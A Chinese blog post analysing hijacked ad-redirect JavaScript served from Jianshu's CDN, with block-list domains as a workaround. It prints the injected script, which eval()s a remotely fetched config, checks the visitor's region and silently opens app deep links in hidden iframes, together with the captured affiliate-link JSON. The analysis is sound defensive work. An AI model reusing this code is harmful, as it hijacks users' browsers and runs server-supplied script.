背景

每次手机上搜资料时,只要进入了简书,那么必定会跳转到各种app(淘宝、京东、天猫、京东金融等等),很烦的啊。
2020-02-02 更新:
在csdn、豆瓣上也发现这个问题。

我还以为是我本地宽带或者dns劫持,但是我本地dns用的是114和119,很少出现这种问题,而且简书也是https,浏览器也是绿标,
所以就usb chrome 远程调试看了下,不看不知道,居然会唤醒这么多app和跳转网页。

临时解决方案

屏蔽 ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),改 hosts 也行(注意 hosts 文件不支持通配符,子域名需要逐条添加)。

方法一: 手机端使用 火狐浏览器,安装 AdGuard 广告过滤插件,屏蔽 ad.lflucky.com  

方法二: 有位读者推荐的软件也很不错:AdGuard Home,安装在软路由中使用~

2020-03-09:

广告代码改为 https://jian.t58b.com/js/jan/jian.js ,所以继续屏蔽 jian.t58b.com

  最后想了下,既然是cdn劫持,那么我把cdn域名一刀切怎么样,别说,效果还蛮不错的,界面干净了。 屏蔽整个cdn下的js,不过这样带来的后果是文章不能动态加载出来,只适合偶尔使用简书。

cdn2.jianshu.io/*.js

手机端用yandex浏览器,装广告屏蔽插件,屏蔽  ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),我个人装的是广告终结者,本来想装uBlock的,懒得折腾就没装。或者路由器ad插件屏蔽这个域名。添加屏蔽域名后完美,终于不再跳转。

分析

因为我的前端是废的,所以也只能进行简单点的分析,大佬们看看就好了。 简单分析了一下跳转js,点击 VM2486:1 进入到js,格式化后的代码如下

(function() {
	/**
	 * Requests URL `a` with a GET XMLHttpRequest and passes the decoded
	 * response to callback `b` once the request completes with HTTP 200.
	 *
	 * @param {string} a - URL of the configuration to fetch.
	 * @param {Function} b - Called with the decoded response; skipped when falsy.
	 */
	function getJson(a, b) {
		var c = new XMLHttpRequest();
		c.open("get", a);
		c.send(null);
		c.onreadystatechange = function() {
			// readyState 4 = request finished; any status other than 200 is ignored silently.
			if (c.readyState == 4 && c.status == 200) {
				// NOTE(review): the response is decoded with eval(), not JSON.parse(),
				// so whatever the server returns is executed as script in the page
				// that embeds this code.
				b && b(eval("(" + c.responseText + ")"))
			}
		}
	}
	/**
	 * Holds the configuration decoded from the fetched product file.
	 *
	 * @param {Object} a - Decoded configuration; `productJson` and `avokeTime` are read.
	 */
	function ProductLink(a) {
		this.product = a.productJson;
		// Region names compared against the geolocation result in init();
		// a match there stops the script before any link is opened.
		this.disabledArea = ["UNITED STATES", "JAPAN", "SINGAPORE", "CANADA", "香港", "北京", "上海"];
		// Multiplied by 1000 in showSecondaryProduct() and used as the interval
		// between secondary links, i.e. a value in seconds.
		this.avokeTime = a.avokeTime
	}
	/**
	 * Entry point: decides whether this visitor gets the app-launch links.
	 * Does nothing when navigator.platform contains "Win" or "Mac"; on any other
	 * platform it waits for the geolocation lookup and then checks the region.
	 */
	ProductLink.prototype.init = function() {
		var b = this;
		// Empty first branch: desktop platforms are skipped entirely.
		if (window.navigator.platform.indexOf("Win") > -1 || window.navigator.platform.indexOf("Mac") > -1) {} else {
			this.isDisabled(function() {
				// `a` stays true unless the visitor's region is on the exclusion list.
				var a = true;
				try {
					for (var i = 0; i < b.disabledArea.length; i++) {
						// returnCitySN is a global that this file never defines; presumably
						// it is set by the cityjson script loaded in isDisabled() — confirm.
						if (returnCitySN["cname"].indexOf(b.disabledArea[i]) > -1) {
							a = false;
							break
						}
					}
				// Any error here (for example returnCitySN being undefined) is swallowed,
				// which leaves `a` true, so the links are still opened.
				} catch(e) {}
				if (!a) {
					return
				}
				b.addElement()
			})
		}
	};
	/**
	 * Injects a <script> element pointing at https://pv.sohu.com/cityjson and
	 * invokes callback `a` exactly once: when that script loads, or after
	 * 4000 ms, whichever happens first. Despite its name, this method makes no
	 * enabled/disabled decision itself; the region check is in the callback
	 * supplied by init().
	 *
	 * @param {Function} a - Continuation to run once; skipped when falsy.
	 */
	ProductLink.prototype.isDisabled = function(a) {
		var b = document.createElement("script");
		// Guard flag so the callback runs only once across onload and the timer.
		var c = false;
		document.body.appendChild(b);
		b.src = "https://pv.sohu.com/cityjson";
		b.onload = function() {
			if (!c) {
				c = true;
				a && a()
			}
		};
		// Fallback: continue after 4 seconds even if the lookup script never loads.
		setTimeout(function() {
			if (!c) {
				c = true;
				a && a()
			}
		},
		4000)
	};
	/**
	 * Waits 2000 ms, then starts the main-product link and the rotation through
	 * the secondary products. No DOM element is created in this method itself;
	 * the iframes are added in newIframe().
	 */
	ProductLink.prototype.addElement = function() {
		var a = this;
		setTimeout(function() {
			a.showMainProject();
			a.showSecondaryProduct()
		},
		2000)
	};
	/**
	 * Opens one link of the configured main product by passing its `appLink`
	 * list and `cancelTime` to showAllKind().
	 */
	ProductLink.prototype.showMainProject = function() {
		this.showAllKind(this.product.mainProduct.appLink, this.product.mainProduct.cancelTime)
	};
	/**
	 * Works through the secondary products in random order, one per timer tick.
	 * Each tick picks a random remaining entry, opens it through showAllKind()
	 * and removes it from the working copy; the timer is cleared once no entries
	 * remain. The tick interval is avokeTime * 1000 ms.
	 */
	ProductLink.prototype.showSecondaryProduct = function() {
		var b = this;
		// concat() with no arguments makes a shallow copy, so the configured list is not modified.
		var c = this.product.secondaryProduct.concat();
		var d = c.length;
		var e = null;
		e = setInterval(function() {
			if (d <= 0) {
				clearInterval(e);
				return
			}
			// Random index into the entries that have not been used yet.
			var a = Math.floor(Math.random() * d);
			b.showAllKind(c[a].appLink, c[a].cancelTime);
			c.splice(a, 1);
			d--
		},
		b.avokeTime * 1000)
	};
	/**
	 * Picks one link at random from link list `a` and opens it via newIframe().
	 * An entry of type "random" supplies its `link` field directly; an entry of
	 * type "date" supplies the value stored under today's date key (the
	 * YYYY-MM-DD string from getCurrentDate()) and is dropped when it has no
	 * value for today. Stops after the first link is opened or when the list
	 * is exhausted.
	 *
	 * @param {Array<Object>} a - Link entries, each with a `type` field.
	 * @param {number} b - Passed to newIframe() as the removal delay in seconds.
	 */
	ProductLink.prototype.showAllKind = function(a, b) {
		// Shallow copy so entries can be removed without touching the configuration.
		var c = a.concat();
		var d = c.length;
		// Becomes true as soon as one link has been opened.
		var e = false;
		var f = this.getCurrentDate();
		while (d > 0 && !e) {
			var g = Math.floor(Math.random() * d);
			if (c[g].type == "random") {
				this.newIframe(c[g].link, b);
				e = true
			} else if (c[g].type == "date") {
				if (c[g][f]) {
					this.newIframe(c[g][f], b);
					e = true
				} else {
					c.splice(g, 1);
					d--
				}
			}
			// NOTE(review): an entry whose type is neither "random" nor "date" is
			// neither opened nor removed, so neither loop condition changes for it.
		}
	};
	/**
	 * Returns the current local date as a zero-padded "YYYY-MM-DD" string, used
	 * by showAllKind() as the lookup key for "date" entries.
	 *
	 * @returns {string} Date string such as "2019-08-31".
	 */
	ProductLink.prototype.getCurrentDate = function() {
		var a = new Date(),
		Y = a.getFullYear() + "-",
		// getMonth() is zero-based, hence the + 1 before padding.
		M = (a.getMonth() + 1 < 10 ? "0" + (a.getMonth() + 1) : a.getMonth() + 1) + "-",
		D = a.getDate() < 10 ? "0" + a.getDate() : a.getDate();
		return Y + M + D
	};
	/**
	 * Loads link `b` in an invisible iframe, loads a second invisible iframe for
	 * counturl.html with the same link as its `url` parameter, and removes both
	 * from the page after `c` seconds.
	 *
	 * For analysts: because both iframes use display:none and are removed again,
	 * the page never shows them; the script's activity is visible only in the
	 * network log or in a DOM snapshot taken before removal.
	 *
	 * @param {string} b - URL to load (custom-scheme app links in the captured config).
	 * @param {number} c - Seconds to keep the iframes before removing them.
	 */
	ProductLink.prototype.newIframe = function(b, c) {
		var d = document.createElement("iframe");
		d.style.display = "none";
		d.src = b;
		document.body.appendChild(d);
		var e = document.createElement("iframe");
		e.style.display = "none";
		// Relative URL; presumably a hit counter recording which link was opened — confirm.
		e.src = "./counturl.html?url=" + encodeURIComponent(b);
		document.body.appendChild(e);
		// The immediately-invoked wrapper binds the two iframes as m and a for the cleanup callback.
		setTimeout((function(m, a) {
			return function() {
				document.body.removeChild(m);
				document.body.removeChild(a)
			}
		})(d, e), c * 1000)
	};
	// Bootstrap: fetch the product configuration from a path relative to the
	// embedding document, then build a ProductLink from it and start init().
	getJson("./json/product.json",
	function(a) {
		new ProductLink(a).init()
	})
})();

嗯,上面有个getJson方法,搜索了下加载记录发现域名是:

https://ad.lflucky.com/janes/json/product.json(对应ip为:59.110.185.253)

阿里云的机器,很不错,考虑到各种不同的宽带用户,给予最佳的劫持体验。

Json内容如下(时间 2019-08-31 15:52 ):

{
    "productJson": {
        "mainProduct": {
            "appName": "tb",
            "appLink": [
                {
                    "type": "random",
                    "link": "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768&materialid=10016&h5Url=https://h5.m.taobao.com/bcec/dahanghai-jump.html?spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768"
                }
            ],
            "cancelTime": 5
        },
        "secondaryProduct": [
            {
                "appName": "uc",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=17707084109410804287&type=multiple&from=6001",
                        "2019-08-31": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-01": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-02": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-03": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
                        "2019-09-04": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
                        "2019-09-05": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001",
                        "2019-09-06": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "sjbd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "baiduboxapp://v1/easybrowse/open?url=https://dwz.cn/1VJnrokX?u=68a5251f61c446dd&needlog=1&logargs={"source":"1023217w","from":"openbox","page":"other","type":"","value":"url","channel":""}"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "yk",
                "appLink": [
                    {
                        "type": "random",
                        "link": "youku://weex?source=00002184&url=https://t.youku.com/yep/page/m/sanfang1903_wmdt?wh_weex=true&isNeedBaseImage=1&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "wph",
                "appLink": [
                    {
                        "type": "random",
                        "link": "vipshop://goHome?tra_from=tra:C01V4m1bc22uzug2::mig_code::ac010m4olsydie4ern10dr6k8vkne6bd"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jdjr",
                "appLink": [
                    {
                        "type": "random",
                        "link": "jdmobile://share?jumpType=8&jumpUrl=https://u.jd.com/Yxw5iX?channellv=hqtf1&channel=default&sourceUrl=1108*gt001"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "pdd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "pinduoduo://com.xunmeng.pinduoduo/duo_coupon_landing.html?goods_id=2338511&pid=8827514_107105089&cpsSign=CC_190820_8827514_107105089_49f497cee8712faf331724b17240bda9&duoduo_type=2"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "zfb",
                "appLink": [
                    {
                        "type": "random",
                        "link": "alipays://platformapi/startapp?appClearTop=false&appId=20000067&startMultApp=YES&url=https://render.alipay.com/p/f/fd-jr8wq5v4/pages/inside/index.html?pid=2088231933430185&partnerid=fl01&__webview_options__=pd%3DNO%26ttb%3Dauto&enableWK=YES"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "openapp.jdmobile://virtual?params={\"category\":\"jump\",\"sourceType\":\"sourceType_test\",\"des\":\"m\",\"url\":\"https://u.jd.com/dRrNLl\",\"unionSource\":\"Awake\",\"channel\":\"cedad4c0ad02455c9a818f1b3d98da1a\",\"union_open\":\"union_cps\"}"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jrtt",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "snssdk143://search?keyword=信息学奥赛取消+有学生集训数月&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-08-31": "snssdk143://search?keyword=在家乡一口气买十套房?柳岩回应&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-01": "snssdk143://search?keyword=国内首例克隆猫主人:花了25万&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-02": "snssdk143://search?keyword=迪士尼不接受调解+坚持翻包检查&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-03": "snssdk143://search?keyword=宠物医疗市场扩张+执业医师稀缺&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-04": "snssdk143://search?keyword=游客坐路中央拍照交警提醒&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-05": "snssdk143://search?keyword=天降垃圾砸车可起诉全楼&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-06": "snssdk143://search?keyword=健身房承诺开泳池未兑现被投诉&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "douyin",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "snssdk1128://detail?id=6727796549604150532&gd_label=click_schema_lx5",
                        "2019-08-31": "snssdk1128://detail?id=6727793959982157063&gd_label=click_schema_lx5",
                        "2019-09-01": "snssdk1128://detail?id=6728772476395949320&gd_label=click_schema_lx5",
                        "2019-09-02": "snssdk1128://detail?id=6728647813158145291&gd_label=click_schema_lx5",
                        "2019-09-03": "snssdk1128://detail?id=6729018672242871556&gd_label=click_schema_lx5",
                        "2019-09-04": "snssdk1128://detail?id=6729044398245498124&gd_label=click_schema_lx5",
                        "2019-09-05": "snssdk1128://detail?id=6728696625901980931&gd_label=click_schema_lx5"
                    }
                ],
                "cancelTime": 5
            }
        ]
    },
    "avokeTime": 2
}

在 productJson.secondaryProduct 看出,总共会跳转以下几个app

  1. UC
  2. sjbd(不知道是啥;从链接协议 baiduboxapp:// 看,应该是手机百度)
  3. yk(优酷)
  4. wph(不知道是啥;从链接协议 vipshop:// 看,应该是唯品会)
  5. jdjr(京东金融)
  6. pdd(拼多多)
  7. zfb(支付宝)
  8. jd(京东)
  9. jrtt(不知道是啥;从链接协议 snssdk143:// 看,应该是今日头条)
  10. douyin(抖音)

可以看出来是真的恶心,最恶心的是跳转到这些页面

https://mip.yemnn.cn/llq_5/p7069z.html
https://m.685862.vip/2019llq_5/p7069z.html?20190901001245&t=1786766884&f=1&i=1

导致不能后退、强制下载app,而且又得看历史记录才能到原来浏览的地方。这个部分没有重现出来,后面补上。

  然后继续往上走,发现这个域名第一次出现的地方是

https://cdn2.jianshu.io/asimov/2.0a635c573bb72b959d07.js,简书的cdn

同时访问搜狐的接口进行ip地域解析,根据用户所在地区进行不同的广告或者跳转app。从上面的代码看,具体做法是:桌面平台(navigator.platform 含 Win 或 Mac)直接不执行,地区名命中 disabledArea 列表时也不执行,其余情况才会唤起 app。 剩下的不用分析也知道了,只有几种可能

  1. 简书 官方自己搞的跳转代码
  2. 简书用的cdn服务商进行的劫持
  3. 运营商结合cdn服务商一起劫持

此时我这里 cdn2.jianshu.io 解析的ip为:163.177.20.232 而在ipip和17ce发现,解析到这个ip的地区是广州联通、加上我的地区,会发生劫持。  

   

Yandex浏览器添加ad插件进行屏蔽

跳转到页面,待复现分析……

更新

由于我开启了ipv6,默认解析dns变成了运营商的ipv6 dns,导致返回的ip和公共dns不一样,运营商+cdn运营商劫持?openwrt居然不能指定ipv6的dns,dhcp给客户端的v6 dns居然是运营商的,而电脑手机会按照v6的dns进行解析,不按照设置的v4 dns解析。

根据ipip显示信息来看,是一家 天际友盟  广告联盟,而我好奇的是,这家公司是怎么拿到简书的ssl证书的? 手机浏览器还显示绿标。需要注意的是,绿标只能说明浏览器连到了持有该域名有效证书的服务器;CDN 节点本身就部署了站点的证书,所以绿标并不能证明返回的 js 内容没有在 CDN 一侧被替换。

 

更新

在禁用ipv6后,我本地使用114和119解析还是被劫持的ip